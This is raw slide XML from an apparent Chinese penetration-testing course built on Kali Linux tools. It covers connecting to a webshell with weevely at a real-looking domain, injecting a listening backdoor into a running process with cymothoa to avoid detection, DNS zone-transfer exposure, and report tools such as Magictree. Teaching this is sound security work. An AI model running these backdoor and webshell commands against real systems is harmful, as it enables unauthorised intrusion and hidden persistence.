          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>weevely http://www.zhengkezixun.cn/test.php test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="834" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1678818" y="2035224"/>
            <a:ext cx="8686285" cy="3263752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="835" name="Shape 835"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618645" y="5448300"/>
            <a:ext cx="6912250" cy="558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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#通过weevely连接一句话木马，可直接执行CMD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Shape 837"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327650" y="504362"/>
            <a:ext cx="1973803" cy="571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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>cymothoa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Shape 838"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477078" y="1357081"/>
            <a:ext cx="11674947" cy="368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500"/>
            </a:pPr>
            <a:r>
              <a:t>Cymothoa 是一款可以将 shellcode 注入到现有进程的（即插进程）后门工具。借助这种注入手段，它能够把shellcode伪装成常规程序。它所注入的后门程序应当能够与被注入的程序（进程）共存，以避免被管理和维护人员怀疑。将shellcode注入到其他进程，还有另外一项优势：即使目标系统的安全防护工具能够监视可执行程序的完整性，只要它不检测内存，那么它就不能发现（插进程）后门程序的进程。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>很赞的点是注入到的进程,只要有权限就行,然后反弹的也就是进程相应的权限(并不需要root那样),当然进程重启或者挂了也就没了.当然动作也是很明显的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Shape 839"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343000" y="6311900"/>
            <a:ext cx="19431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实例演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Shape 840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3164931" y="7533812"/>
            <a:ext cx="6674938"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>利用Cymothoa注入后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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42" name="Shape 842"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619329" y="5655904"/>
            <a:ext cx="9567384" cy="101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2500"/>
            </a:pPr>
            <a:r>
              <a:t>#在使用Cymothoa时，须通过-p 选项指定目标进程的PID，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>  并通过-s选项指定shellcode的编号。例如对firefox进程进行注入。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Shape 843"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275795" y="363967"/>
            <a:ext cx="4906294" cy="711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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>利用Cymothoa注入后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Shape 844"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619329" y="1140800"/>
            <a:ext cx="9567384"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#首先可先查看程序PID（*nix系统  ps ，windows系统  tasklist)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="845" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="897934" y="2109236"/>
            <a:ext cx="9903416" cy="2659623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="846" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="814866" y="7116757"/>
            <a:ext cx="9567384" cy="896943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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1" name="Shape 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501426" y="704849"/>
            <a:ext cx="4839146" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>关于DNS区域传送漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Shape 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837722" y="2038349"/>
            <a:ext cx="10738210" cy="3302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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>区域传送操作指的是一台后备服务器使用来自主服务器的数据刷新自己的zone数据库。一般来说，DNS区域传送操作只在网络里真的有后备域名DNS服务器时才有必要执行，但许多DNS服务器却被错误地配置成只要有人发出请求，就会向对方提供一个zone数据库的拷贝。当一个单位没有使用公用/私用DNS机制来分割外部公用DNS信息和内部私用DNS信息的时候，此时内部主机名和IP地址都暴露给了攻击者。就像是把一个单位的内部网络完整蓝图或导航图奉送给了别人。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="203" name="image14.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358726" y="5734050"/>
            <a:ext cx="8505412" cy="3541453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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48" name="Shape 848"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="847929" y="7143730"/>
            <a:ext cx="11608463" cy="1854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2500"/>
            </a:pPr>
            <a:r>
              <a:t>#注入成功后如上图，其中  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>-y </a:t>
            </a:r>
            <a:r>
              <a:t>代表开放后门端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>在实际渗透到目标主机之后，可把cymothoa的可执行程序复制到目标主机上，继而生成后门程序。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="849" name="Shape 849"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275795" y="363967"/>
            <a:ext cx="4906294" cy="711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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>利用Cymothoa注入后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Shape 850"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644729" y="1536536"/>
            <a:ext cx="4906293"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1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>cymothoa -p 1353 -s 0 -y 9000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="851" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1758977" y="2600015"/>
            <a:ext cx="8674073" cy="3962837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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3" name="Shape 853"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933205" y="761999"/>
            <a:ext cx="2247901" cy="85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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="4200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>编写报告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="854" name="Shape 854"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5594944" y="5659811"/>
            <a:ext cx="1814912" cy="1869439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Magictree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>dradis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="Shape 855"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497012" y="1645574"/>
            <a:ext cx="10436822" cy="1869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l" defTabSz="914400">
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>编写报告是完成所有诊断结束后进行的步骤。通过诊断导出满意的结果固然重要，而通过报告将结果展现给客户更为重要。因此，我们有必要慎重考虑写入报告的内容，及其中需要特别浅掉的部分。在实际业务中，人们很少使用Kali Linux支持的报告编写工具，一般会使用极普遍的Word、PPt、Excel等程序。尽管如此，我们仍然打算介绍Kali Linux中制裁的报告编写简易工具，，以及实际业务中编写文档时的注意事项。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Shape 856"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5530849" y="4308011"/>
            <a:ext cx="19431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内容概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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8" name="Shape 858"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049866" y="2390986"/>
            <a:ext cx="10148712" cy="269580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1300480">
              <a:defRPr sz="3400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>管理诊断结果</a:t>
            </a:r>
            <a:r>
              <a:t>———Magictree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Magictree</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>工具能提高渗透测试效率，其设计允许执行简单的数据统合、查询、外部命令和创建报告等操作。它遵循树节点结构来管理主机和相关数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="Shape 860"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783166" y="1311486"/>
            <a:ext cx="10148712" cy="6380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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>进入到</a:t>
            </a:r>
            <a:r>
              <a:t>Magictree</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="861" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="5767" r="1863" b="5299"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1399822" y="2558057"/>
            <a:ext cx="10400267" cy="5742514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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3" name="Shape 863"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884766" y="1247986"/>
            <a:ext cx="10148712" cy="6380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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>File-&gt;Open</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>，选择要上传前面渗透测试阶段生成的文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="864" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1644" t="16021" r="1863" b="52587"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1945066" y="2324946"/>
            <a:ext cx="8786400" cy="1401634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="865" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1490" t="5871" r="3033" b="5871"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2162951" y="4637475"/>
            <a:ext cx="8678913" cy="4694368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Shape 867"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833966" y="981286"/>
            <a:ext cx="10148712" cy="1157683"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>然后</a:t>
            </a:r>
            <a:r>
              <a:t>Magic Tree</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>自动将映射所有的数据到树节点结构。扩展单个节点，我们可以进一步看到数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="868" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="694" t="7440" r="73921" b="7418"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360875" y="2608015"/>
            <a:ext cx="4044380" cy="6359017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="869" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="621" t="9350" r="57315" b="3770"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6909082" y="2603217"/>
            <a:ext cx="3993389" cy="6368903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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71" name="Shape 871"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700757" y="638668"/>
            <a:ext cx="10148713" cy="2693316"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Magic tree</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>允许查询已经收集的数据，执行给定的</a:t>
            </a:r>
            <a:r>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>命令。有不同的方法用来查询数据。我们可以通过这种方式提取所需要的数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>例如，如果我们选择的操作系统，然后点击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>Q *”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮，它会列出类型为</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>OS”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>的所有节点。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="872" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
